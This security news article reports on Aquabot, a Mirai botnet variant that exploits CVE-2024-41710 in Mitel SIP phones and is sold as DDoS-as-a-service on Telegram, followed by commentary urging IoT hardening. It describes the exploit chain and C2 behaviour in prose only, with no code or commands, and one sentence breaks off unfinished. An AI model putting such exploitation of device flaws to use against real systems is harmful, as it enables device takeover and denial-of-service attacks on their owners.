Mirai Variant 'Aquabot' Exploits Mitel Device Flaws in DDoS-as-a-Service Attacks

2025-01-29

A new variant of the notorious Mirai botnet, dubbed Aquabot, is on the rise, exploiting vulnerabilities in Mitel SIP phones to launch powerful distributed denial-of-service (DDoS) attacks. This version brings with it a fresh approach to the botnet’s operations, including a DDoS-as-a-service model marketed through platforms like Telegram. Researchers have uncovered alarming details about how the botnet leverages flaws in Mitel devices, especially targeting the CVE-2024-41710 vulnerability. The new variant adds enhanced persistence mechanisms and the ability to communicate with command-and-control (C2) systems. With this development, Aquabot is shaping up to be a significant player in the world of DDoS attacks, furthering concerns about the security of Internet of Things (IoT) devices.

the Aquabot Threat

The Mirai botnet, already infamous for its involvement in DDoS attacks, has introduced a new variant, Aquabot. This iteration exploits a critical vulnerability in Mitel SIP phones, specifically CVE-2024-41710. Discovered by the Akamai Security Intelligence and Response Team (SIRT), the flaw allows attackers to gain root access to vulnerable devices, enabling them to use them in DDoS attacks. The vulnerability arises from an input sanitization flaw in the device firmware.

Aquabotv3, as

What sets Aquabot apart is its promotion as a DDoS-as-a-service platform, marketed through Telegram channels under various names such as Cursinq Firewall and The Eye Services. It offers Layer 4 and Layer 7 DDoS capabilities and encourages attackers to utilize it for their malicious campaigns.

Akamai’s researchers also noted that Aquabotv3 has been active in exploiting Mitel phone vulnerabilities since January 2025. The exploit uses a payload that fetches a shell script to install Mirai malware on compromised devices, which can then be used in DDoS operations. The malware is versatile, supporting multiple architectures, including x86 and ARM.

The botnet’s continued success in exploiting IoT devices underscores the importance of proper security measures for such devices, as they often suffer from weak or default security configurations.

What Undercode Says:

The emergence of Aquabot and its exploitation of the Mitel vulnerability is yet another example of how botnet operators continue to evolve their methods and target weaknesses in IoT devices. By leveraging a known vulnerability in Mitel SIP phones, Aquabot demonstrates how even widely used corporate devices can become the entry point for large-scale attacks. The ongoing success of the Mirai family of botnets, particularly its variants like Aquabot, points to the persistent and growing threat of DDoS attacks in our increasingly connected world.

The exploitation of CVE-2024-41710 highlights a crucial issue in the security of VoIP devices. While many organizations focus on securing more traditional IT infrastructure, they often overlook the vulnerabilities within their networked communication systems like SIP phones, which are now increasingly targeted by attackers. This vulnerability allows attackers to gain root access to the device, which gives them full control over its operations. The exploitation of such flaws is not just an academic concern; it can have a real-world impact, especially in corporate environments where these devices are used for critical communications.

Aquabotv3 introduces some interesting new features, including the ability to report back to the attacker’s C2 when a kill signal is detected. Although no response has been seen from the C2, this feature is an indication of how botnets are becoming more sophisticated and capable of responding to commands in real-time. This dynamic approach to botnet control allows the attacker to maintain a constant presence and adapt to defenses.

Moreover, the DDoS-as-a-service model being promoted by the Aquabot operators is especially concerning. By offering DDoS capabilities through Telegram, these threat actors are lowering the barrier to entry for aspiring cybercriminals. In the past, launching a DDoS attack required significant resources and technical expertise, but now, anyone can rent botnet services to carry out large-scale attacks. This shift democratizes DDoS attacks and could lead to an increase in attacks from less-skilled individuals who may not have a full understanding of the consequences.

The role of IoT devices in these botnets cannot be overstated. IoT devices are particularly vulnerable because many of them lack proper security features or are left with default configurations. The fact that these devices are often at the end of their service life or never updated makes them prime targets for botnets like Mirai and its variants. Attackers can easily exploit these vulnerabilities to build large botnets that are used for various malicious purposes, including launching DDoS attacks. This highlights a critical need for organizations to take proactive steps in securing their IoT devices, especially in corporate environments where sensitive data and communications are involved.

In conclusion, the continued evolution of the Mirai botnet and the rise of DDoS-as-a-service platforms like Aquabot signal that the threat landscape is becoming more complex and accessible. Organizations need to ensure that their IoT devices are secure, updated, and properly configured to avoid falling victim to such attacks. As botnets grow in sophistication and availability, it is essential for businesses and individuals to stay vigilant and invest in securing their networks and devices against these persistent threats.